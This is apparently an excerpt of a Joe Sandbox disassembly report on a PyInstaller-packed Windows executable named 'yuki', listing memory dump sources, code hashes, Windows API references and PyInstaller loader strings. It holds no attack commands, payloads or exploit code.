                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                      • Instruction ID: 3f3bcb31becea22cfc6ccfdca919fbfa1f0081fd8b53f52e02741b69201dc810
                                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                      • Instruction Fuzzy Hash: C54174728097CF05E9B98D38072C6B42A809F127A2D9852B5DDDDB73D7CF1DA987C244
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 485612231-0
                                                                                                      • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                      • Instruction ID: c502c97dcdf7b7cf7785ae5574147d992fdc4c9567016810ccee28085855a24a
                                                                                                      • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                      • Instruction Fuzzy Hash: 89410372724A9582EF14CF3ADA2856973A1BB48FD0B499036EE4DD7B54DF3DD0428344
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                      • Instruction ID: 7c69a3c173ef2c8ac2d7cd3c2a6bbd46db57936b688bd536a7b86481df73a655
                                                                                                      • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                      • Instruction Fuzzy Hash: E731C132B18B8242E6749F356A5412EAAD4EF85BD1F144239EACE93BD5DF3CD4028748
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                      • Instruction ID: 7164bef8453e76993552f14a7a10c1150f67a37f5f7a683230b46a40fb7eb7da
                                                                                                      • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                      • Instruction Fuzzy Hash: C6F04F71B182968ADBA88F69B91662977D4F708381F90C03DE6C9C3A04DE3CD5618F88
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                      • Instruction ID: fb7b91e7d9f3d2ac7411f93ff11c74bf60a4e21770d940704f42bf01df618151
                                                                                                      • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                      • Instruction Fuzzy Hash: 26A0016191C80AE0E6A48F20A9940352270BB68703B900032E58D914B09E2DA848E288
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F5840
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F5852
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F5889
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F589B
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F58B4
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F58C6
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F58DF
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F58F1
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F590D
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F591F
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F593B
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F594D
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F5969
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F597B
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F5997
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F59A9
                                                                                                      • GetProcAddress.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F59C5
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F64CF,?,00007FF6C81F336E), ref: 00007FF6C81F59D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLastProc
                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                      • API String ID: 199729137-653951865
                                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                      • Instruction ID: aab8188c791bb1a450b855ab5df266b80585d359a069a88b6084dd9df76b1da0
                                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                      • Instruction Fuzzy Hash: 0722D77490DB07A1FA35CF31AA585B423F4AF14B97F651035D4AE92660EF3EE948C288
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF6C81F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6C81F45F4,00000000,00007FF6C81F1985), ref: 00007FF6C81F93C9
                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6C81F86B7,?,?,00000000,00007FF6C81F3CBB), ref: 00007FF6C81F822C
                                                                                                        • Part of subcall function 00007FF6C81F2810: MessageBoxW.USER32 ref: 00007FF6C81F28EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                      • API String ID: 1662231829-930877121
                                                                                                      • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                      • Instruction ID: a5b8e3bb7e984e77e8078f76d7cb1be9d1441091d42cc2a162b6f88f25acad3b
                                                                                                      • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                      • Instruction Fuzzy Hash: 3451B731A2C64391FB709F34D9552BA62E1AFA4B83F544431DA8EC2AE5EE3CE405C348
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                      • String ID: P%
                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                      • Instruction ID: a483423d60f609b9bbf4043ad0e64faf7f4c3d8145b571826414ba6002ad7300
                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                      • Instruction Fuzzy Hash: 3751E336608BA186D6349F36B4581BAB7A1FB98B62F004135EBDE83694DF3CD085DB14
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                      • Instruction ID: e87a7164f9c5ad2de051dceac6d5f43f94187ff52f7f0534419af528d136d8b2
                                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                      • Instruction Fuzzy Hash: 2F21D831B1CA4381E7618F7AE95817962A0EF88F92F584230DA9DC37E4DE3DD9508308
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: -$:$f$p$p
                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                      • Instruction ID: f98d65177024bed0da22dd345bc5c21193b64e4d84f3fae338ee472353fade2b
                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                      • Instruction Fuzzy Hash: 9C128371E0C3C386FB705E24D268A7976A1FB50752F844135E6CA86AC4DF3CED849B98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$f$p$p$f
                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                      • Instruction ID: 9e57a1617339b1d48da16a3e69bdc03b1b6758898bfc421de271b15bac1f142c
                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                      • Instruction Fuzzy Hash: E8127171E0C1C386FB349F24E26827A76A1FB40756F944035E6DB86AD4DF7CE4808B98
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                      • Opcode ID: b86492fec82845683ed30ee17fa4372ac3c9e67344e1de42683d38f875b626aa
                                                                                                      • Instruction ID: 49fceec64e5b9b94c45d0cf2f71759fdad7d345f3e01d2614f41c446524cc5e8
                                                                                                      • Opcode Fuzzy Hash: b86492fec82845683ed30ee17fa4372ac3c9e67344e1de42683d38f875b626aa
                                                                                                      • Instruction Fuzzy Hash: 2E41A171A0869382EA21DF32A9086BA63D1BF54FD6F544432ED8C87B95DF3CE502C748
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                      • Opcode ID: 0668517533cd0d68b5080e8717ca13fde84679c12f5f15204a3f6509b4669e23
                                                                                                      • Instruction ID: 2a19cdc38eac49eb82a6d6c053d2ebc938af3d5f7f1f7ffa23aa361086c591cd
                                                                                                      • Opcode Fuzzy Hash: 0668517533cd0d68b5080e8717ca13fde84679c12f5f15204a3f6509b4669e23
                                                                                                      • Instruction Fuzzy Hash: CF41CF32A0868396EB21DF3195041BA63E0FF54B95F944432ED8E87BA5DF3CE902C748
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 849930591-393685449
                                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                      • Instruction ID: 70b8f3a29761cb15e105b8dee35a76589379800c5e6eb7fa2c6d69cb14709672
                                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                      • Instruction Fuzzy Hash: B7D16C32A087428AEB309F3594443AD77E0FB65B99F100135EA8D9BF9ADF38E081C705
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C81F3706,?,00007FF6C81F3804), ref: 00007FF6C81F2C9E
                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C81F3706,?,00007FF6C81F3804), ref: 00007FF6C81F2D63
                                                                                                      • MessageBoxW.USER32 ref: 00007FF6C81F2D99
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                      • API String ID: 3940978338-251083826
                                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                      • Instruction ID: 1f23813749724100ef894ba43690499bab28face605a6ddcf1e04a6b928a782d
                                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                      • Instruction Fuzzy Hash: A631C732708A4152E6309F35B9142AA66A1BF98BDAF410135EF8DD3B69DF3CD506C344
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6C81FDF7A,?,?,?,00007FF6C81FDC6C,?,?,?,00007FF6C81FD869), ref: 00007FF6C81FDD4D
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6C81FDF7A,?,?,?,00007FF6C81FDC6C,?,?,?,00007FF6C81FD869), ref: 00007FF6C81FDD5B
                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6C81FDF7A,?,?,?,00007FF6C81FDC6C,?,?,?,00007FF6C81FD869), ref: 00007FF6C81FDD85
                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6C81FDF7A,?,?,?,00007FF6C81FDC6C,?,?,?,00007FF6C81FD869), ref: 00007FF6C81FDDF3
                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6C81FDF7A,?,?,?,00007FF6C81FDC6C,?,?,?,00007FF6C81FD869), ref: 00007FF6C81FDDFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
